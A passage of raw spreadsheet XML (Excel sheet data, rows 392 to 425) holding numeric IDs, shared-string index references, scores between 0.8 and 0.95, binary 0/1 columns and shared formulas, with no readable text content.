      </c>
      <c r="D392" s="62" t="s">
        <v>1361</v>
      </c>
      <c r="E392" s="62" t="s">
        <v>1362</v>
      </c>
      <c r="F392" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G392" s="62">
        <v>0.95</v>
      </c>
      <c r="H392" s="64">
        <v>1.0</v>
      </c>
      <c r="I392" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J392" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K392" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L392" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O392" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="62">
        <v>29071.0</v>
      </c>
      <c r="B393" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C393" s="63" t="s">
        <v>1363</v>
      </c>
      <c r="D393" s="62" t="s">
        <v>1364</v>
      </c>
      <c r="E393" s="62" t="s">
        <v>1365</v>
      </c>
      <c r="F393" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G393" s="62">
        <v>0.95</v>
      </c>
      <c r="H393" s="64">
        <v>1.0</v>
      </c>
      <c r="I393" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J393" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K393" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L393" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O393" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="62">
        <v>29127.0</v>
      </c>
      <c r="B394" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C394" s="63" t="s">
        <v>1366</v>
      </c>
      <c r="D394" s="62" t="s">
        <v>1367</v>
      </c>
      <c r="E394" s="62" t="s">
        <v>1368</v>
      </c>
      <c r="F394" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G394" s="62">
        <v>0.9</v>
      </c>
      <c r="H394" s="64">
        <v>1.0</v>
      </c>
      <c r="I394" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J394" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K394" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L394" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O394" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="62">
        <v>30039.0</v>
      </c>
      <c r="B395" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C395" s="63" t="s">
        <v>1369</v>
      </c>
      <c r="D395" s="62" t="s">
        <v>1370</v>
      </c>
      <c r="E395" s="62" t="s">
        <v>1371</v>
      </c>
      <c r="F395" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G395" s="62">
        <v>0.95</v>
      </c>
      <c r="H395" s="64">
        <v>1.0</v>
      </c>
      <c r="I395" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J395" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K395" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L395" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O395" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="62">
        <v>30103.0</v>
      </c>
      <c r="B396" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C396" s="63" t="s">
        <v>1372</v>
      </c>
      <c r="D396" s="62" t="s">
        <v>1373</v>
      </c>
      <c r="E396" s="62" t="s">
        <v>1374</v>
      </c>
      <c r="F396" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G396" s="62">
        <v>0.9</v>
      </c>
      <c r="H396" s="64">
        <v>1.0</v>
      </c>
      <c r="I396" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J396" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K396" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L396" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O396" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="62">
        <v>30578.0</v>
      </c>
      <c r="B397" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C397" s="63" t="s">
        <v>1375</v>
      </c>
      <c r="D397" s="62" t="s">
        <v>1376</v>
      </c>
      <c r="E397" s="62" t="s">
        <v>1377</v>
      </c>
      <c r="F397" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G397" s="62">
        <v>0.9</v>
      </c>
      <c r="H397" s="64">
        <v>0.0</v>
      </c>
      <c r="I397" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J397" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K397" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L397" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O397" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="62">
        <v>30783.0</v>
      </c>
      <c r="B398" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C398" s="63" t="s">
        <v>1378</v>
      </c>
      <c r="D398" s="62" t="s">
        <v>1379</v>
      </c>
      <c r="E398" s="62" t="s">
        <v>1380</v>
      </c>
      <c r="F398" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G398" s="62">
        <v>0.85</v>
      </c>
      <c r="H398" s="64">
        <v>0.0</v>
      </c>
      <c r="I398" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J398" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K398" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L398" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O398" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="62">
        <v>30860.0</v>
      </c>
      <c r="B399" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C399" s="63" t="s">
        <v>1381</v>
      </c>
      <c r="D399" s="62" t="s">
        <v>1382</v>
      </c>
      <c r="E399" s="62" t="s">
        <v>1383</v>
      </c>
      <c r="F399" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G399" s="62">
        <v>0.9</v>
      </c>
      <c r="H399" s="64">
        <v>1.0</v>
      </c>
      <c r="I399" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J399" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K399" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L399" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O399" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="62">
        <v>31091.0</v>
      </c>
      <c r="B400" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C400" s="63" t="s">
        <v>1384</v>
      </c>
      <c r="D400" s="62" t="s">
        <v>1385</v>
      </c>
      <c r="E400" s="62" t="s">
        <v>1386</v>
      </c>
      <c r="F400" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G400" s="62">
        <v>0.85</v>
      </c>
      <c r="H400" s="64">
        <v>1.0</v>
      </c>
      <c r="I400" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J400" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K400" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L400" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O400" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="62">
        <v>32540.0</v>
      </c>
      <c r="B401" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C401" s="63" t="s">
        <v>1387</v>
      </c>
      <c r="D401" s="62" t="s">
        <v>1388</v>
      </c>
      <c r="E401" s="62" t="s">
        <v>1389</v>
      </c>
      <c r="F401" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G401" s="62">
        <v>0.9</v>
      </c>
      <c r="H401" s="64">
        <v>1.0</v>
      </c>
      <c r="I401" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J401" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K401" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L401" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O401" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="62">
        <v>33109.0</v>
      </c>
      <c r="B402" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C402" s="63" t="s">
        <v>1390</v>
      </c>
      <c r="D402" s="62" t="s">
        <v>1391</v>
      </c>
      <c r="E402" s="62" t="s">
        <v>1392</v>
      </c>
      <c r="F402" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G402" s="62">
        <v>0.85</v>
      </c>
      <c r="H402" s="64">
        <v>1.0</v>
      </c>
      <c r="I402" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J402" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K402" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L402" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O402" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="62">
        <v>33357.0</v>
      </c>
      <c r="B403" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C403" s="63" t="s">
        <v>1393</v>
      </c>
      <c r="D403" s="62" t="s">
        <v>1394</v>
      </c>
      <c r="E403" s="62" t="s">
        <v>1395</v>
      </c>
      <c r="F403" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G403" s="62">
        <v>0.9</v>
      </c>
      <c r="H403" s="64">
        <v>1.0</v>
      </c>
      <c r="I403" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J403" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K403" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L403" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O403" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="62">
        <v>33742.0</v>
      </c>
      <c r="B404" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C404" s="63" t="s">
        <v>1396</v>
      </c>
      <c r="D404" s="62" t="s">
        <v>1397</v>
      </c>
      <c r="E404" s="62" t="s">
        <v>1398</v>
      </c>
      <c r="F404" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G404" s="62">
        <v>0.95</v>
      </c>
      <c r="H404" s="64">
        <v>1.0</v>
      </c>
      <c r="I404" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J404" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K404" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L404" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O404" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="62">
        <v>842.0</v>
      </c>
      <c r="B405" s="62" t="s">
        <v>60</v>
      </c>
      <c r="C405" s="63" t="s">
        <v>1399</v>
      </c>
      <c r="D405" s="62" t="s">
        <v>1400</v>
      </c>
      <c r="E405" s="62" t="s">
        <v>1401</v>
      </c>
      <c r="F405" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G405" s="62">
        <v>0.8</v>
      </c>
      <c r="H405" s="64" t="s">
        <v>135</v>
      </c>
      <c r="I405" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J405" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K405" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L405" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O405" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="62">
        <v>1197.0</v>
      </c>
      <c r="B406" s="62" t="s">
        <v>60</v>
      </c>
      <c r="C406" s="63" t="s">
        <v>1402</v>
      </c>
      <c r="D406" s="62" t="s">
        <v>1403</v>
      </c>
      <c r="E406" s="62" t="s">
        <v>1404</v>
      </c>
      <c r="F406" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G406" s="62">
        <v>0.9</v>
      </c>
      <c r="H406" s="64">
        <v>1.0</v>
      </c>
      <c r="I406" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J406" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K406" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L406" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O406" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="62">
        <v>2043.0</v>
      </c>
      <c r="B407" s="62" t="s">
        <v>60</v>
      </c>
      <c r="C407" s="63" t="s">
        <v>1405</v>
      </c>
      <c r="D407" s="62" t="s">
        <v>1406</v>
      </c>
      <c r="E407" s="62" t="s">
        <v>1407</v>
      </c>
      <c r="F407" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G407" s="62">
        <v>0.95</v>
      </c>
      <c r="H407" s="64">
        <v>1.0</v>
      </c>
      <c r="I407" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J407" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K407" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L407" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O407" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="62">
        <v>2424.0</v>
      </c>
      <c r="B408" s="62" t="s">
        <v>60</v>
      </c>
      <c r="C408" s="63" t="s">
        <v>1408</v>
      </c>
      <c r="D408" s="62" t="s">
        <v>1409</v>
      </c>
      <c r="E408" s="62" t="s">
        <v>1410</v>
      </c>
      <c r="F408" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G408" s="62">
        <v>0.95</v>
      </c>
      <c r="H408" s="64">
        <v>1.0</v>
      </c>
      <c r="I408" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J408" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K408" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L408" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O408" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="62">
        <v>2432.0</v>
      </c>
      <c r="B409" s="62" t="s">
        <v>60</v>
      </c>
      <c r="C409" s="63" t="s">
        <v>1411</v>
      </c>
      <c r="D409" s="62" t="s">
        <v>1412</v>
      </c>
      <c r="E409" s="62" t="s">
        <v>1413</v>
      </c>
      <c r="F409" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G409" s="62">
        <v>0.9</v>
      </c>
      <c r="H409" s="64">
        <v>1.0</v>
      </c>
      <c r="I409" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J409" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K409" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L409" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O409" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="62">
        <v>2464.0</v>
      </c>
      <c r="B410" s="62" t="s">
        <v>60</v>
      </c>
      <c r="C410" s="63" t="s">
        <v>1414</v>
      </c>
      <c r="D410" s="62" t="s">
        <v>1415</v>
      </c>
      <c r="E410" s="62" t="s">
        <v>1416</v>
      </c>
      <c r="F410" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G410" s="62">
        <v>0.95</v>
      </c>
      <c r="H410" s="64">
        <v>1.0</v>
      </c>
      <c r="I410" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J410" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K410" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L410" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O410" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="62">
        <v>40.0</v>
      </c>
      <c r="B411" s="62" t="s">
        <v>62</v>
      </c>
      <c r="C411" s="63" t="s">
        <v>1417</v>
      </c>
      <c r="D411" s="62" t="s">
        <v>1418</v>
      </c>
      <c r="E411" s="62" t="s">
        <v>1419</v>
      </c>
      <c r="F411" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G411" s="62">
        <v>0.85</v>
      </c>
      <c r="H411" s="64">
        <v>1.0</v>
      </c>
      <c r="I411" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J411" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K411" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L411" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O411" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="62">
        <v>47.0</v>
      </c>
      <c r="B412" s="62" t="s">
        <v>62</v>
      </c>
      <c r="C412" s="63" t="s">
        <v>1420</v>
      </c>
      <c r="D412" s="62" t="s">
        <v>1421</v>
      </c>
      <c r="E412" s="62" t="s">
        <v>1422</v>
      </c>
      <c r="F412" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G412" s="62">
        <v>0.85</v>
      </c>
      <c r="H412" s="64">
        <v>0.0</v>
      </c>
      <c r="I412" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J412" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K412" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L412" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O412" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="62">
        <v>241.0</v>
      </c>
      <c r="B413" s="62" t="s">
        <v>65</v>
      </c>
      <c r="C413" s="63" t="s">
        <v>1423</v>
      </c>
      <c r="D413" s="62" t="s">
        <v>1424</v>
      </c>
      <c r="E413" s="62" t="s">
        <v>1425</v>
      </c>
      <c r="F413" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G413" s="62">
        <v>0.95</v>
      </c>
      <c r="H413" s="64">
        <v>1.0</v>
      </c>
      <c r="I413" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J413" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K413" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L413" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O413" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="62">
        <v>574.0</v>
      </c>
      <c r="B414" s="62" t="s">
        <v>65</v>
      </c>
      <c r="C414" s="63" t="s">
        <v>1426</v>
      </c>
      <c r="D414" s="62" t="s">
        <v>1427</v>
      </c>
      <c r="E414" s="62" t="s">
        <v>1428</v>
      </c>
      <c r="F414" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G414" s="62">
        <v>0.8</v>
      </c>
      <c r="H414" s="64">
        <v>1.0</v>
      </c>
      <c r="I414" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J414" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K414" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L414" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O414" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="62">
        <v>18350.0</v>
      </c>
      <c r="B415" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C415" s="63" t="s">
        <v>1429</v>
      </c>
      <c r="D415" s="62" t="s">
        <v>1430</v>
      </c>
      <c r="E415" s="62" t="s">
        <v>1431</v>
      </c>
      <c r="F415" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G415" s="62">
        <v>0.9</v>
      </c>
      <c r="H415" s="64">
        <v>0.0</v>
      </c>
      <c r="I415" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J415" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K415" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L415" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O415" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="62">
        <v>18363.0</v>
      </c>
      <c r="B416" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C416" s="63" t="s">
        <v>1432</v>
      </c>
      <c r="D416" s="62" t="s">
        <v>1433</v>
      </c>
      <c r="E416" s="62" t="s">
        <v>1434</v>
      </c>
      <c r="F416" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G416" s="62">
        <v>0.95</v>
      </c>
      <c r="H416" s="64">
        <v>1.0</v>
      </c>
      <c r="I416" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J416" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K416" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L416" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O416" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="62">
        <v>18368.0</v>
      </c>
      <c r="B417" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C417" s="63" t="s">
        <v>1435</v>
      </c>
      <c r="D417" s="62" t="s">
        <v>1436</v>
      </c>
      <c r="E417" s="62" t="s">
        <v>1437</v>
      </c>
      <c r="F417" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G417" s="62">
        <v>0.95</v>
      </c>
      <c r="H417" s="64">
        <v>1.0</v>
      </c>
      <c r="I417" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J417" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K417" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L417" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O417" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="62">
        <v>18373.0</v>
      </c>
      <c r="B418" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C418" s="63" t="s">
        <v>1438</v>
      </c>
      <c r="D418" s="62" t="s">
        <v>1439</v>
      </c>
      <c r="E418" s="62" t="s">
        <v>1440</v>
      </c>
      <c r="F418" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G418" s="62">
        <v>0.9</v>
      </c>
      <c r="H418" s="64">
        <v>0.0</v>
      </c>
      <c r="I418" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J418" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K418" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L418" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O418" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="62">
        <v>18447.0</v>
      </c>
      <c r="B419" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C419" s="63" t="s">
        <v>1441</v>
      </c>
      <c r="D419" s="62" t="s">
        <v>1442</v>
      </c>
      <c r="E419" s="62" t="s">
        <v>1443</v>
      </c>
      <c r="F419" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G419" s="62">
        <v>0.95</v>
      </c>
      <c r="H419" s="64">
        <v>1.0</v>
      </c>
      <c r="I419" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J419" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K419" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L419" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M419" s="62" t="s">
        <v>1444</v>
      </c>
      <c r="N419" s="62" t="s">
        <v>1445</v>
      </c>
      <c r="O419" s="62">
        <v>0.0</v>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="62">
        <v>18585.0</v>
      </c>
      <c r="B420" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C420" s="63" t="s">
        <v>1446</v>
      </c>
      <c r="D420" s="62" t="s">
        <v>1447</v>
      </c>
      <c r="E420" s="62" t="s">
        <v>1448</v>
      </c>
      <c r="F420" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G420" s="62">
        <v>0.95</v>
      </c>
      <c r="H420" s="64">
        <v>1.0</v>
      </c>
      <c r="I420" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J420" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K420" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L420" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O420" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="62">
        <v>18605.0</v>
      </c>
      <c r="B421" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C421" s="63" t="s">
        <v>1449</v>
      </c>
      <c r="D421" s="62" t="s">
        <v>1450</v>
      </c>
      <c r="E421" s="62" t="s">
        <v>1451</v>
      </c>
      <c r="F421" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G421" s="62">
        <v>0.85</v>
      </c>
      <c r="H421" s="64">
        <v>0.0</v>
      </c>
      <c r="I421" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J421" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K421" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L421" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O421" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="62">
        <v>18669.0</v>
      </c>
      <c r="B422" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C422" s="63" t="s">
        <v>1452</v>
      </c>
      <c r="D422" s="62" t="s">
        <v>1453</v>
      </c>
      <c r="E422" s="62" t="s">
        <v>1454</v>
      </c>
      <c r="F422" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G422" s="62">
        <v>0.95</v>
      </c>
      <c r="H422" s="64">
        <v>1.0</v>
      </c>
      <c r="I422" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J422" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K422" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L422" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O422" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="62">
        <v>18738.0</v>
      </c>
      <c r="B423" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C423" s="63" t="s">
        <v>1455</v>
      </c>
      <c r="D423" s="62" t="s">
        <v>1456</v>
      </c>
      <c r="E423" s="62" t="s">
        <v>1457</v>
      </c>
      <c r="F423" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G423" s="62">
        <v>0.85</v>
      </c>
      <c r="H423" s="64">
        <v>0.0</v>
      </c>
      <c r="I423" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J423" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K423" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L423" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O423" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="62">
        <v>18833.0</v>
      </c>
      <c r="B424" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C424" s="63" t="s">
        <v>1458</v>
      </c>
      <c r="D424" s="62" t="s">
        <v>1459</v>
      </c>
      <c r="E424" s="62" t="s">
        <v>1460</v>
      </c>
      <c r="F424" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G424" s="62">
        <v>0.9</v>
      </c>
      <c r="H424" s="64">
        <v>0.0</v>
      </c>
      <c r="I424" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J424" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K424" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L424" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O424" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="62">
        <v>18838.0</v>
      </c>
      <c r="B425" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C425" s="63" t="s">
        <v>1461</v>
      </c>
      <c r="D425" s="62" t="s">
        <v>1462</v>
      </c>
      <c r="E425" s="62" t="s">
        <v>1463</v>
      </c>
      <c r="F425" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G425" s="62">
        <v>0.9</v>
      </c>
      <c r="H425" s="64">
        <v>0.0</v>
      </c>
      <c r="I425" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J425" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K425" s="65">
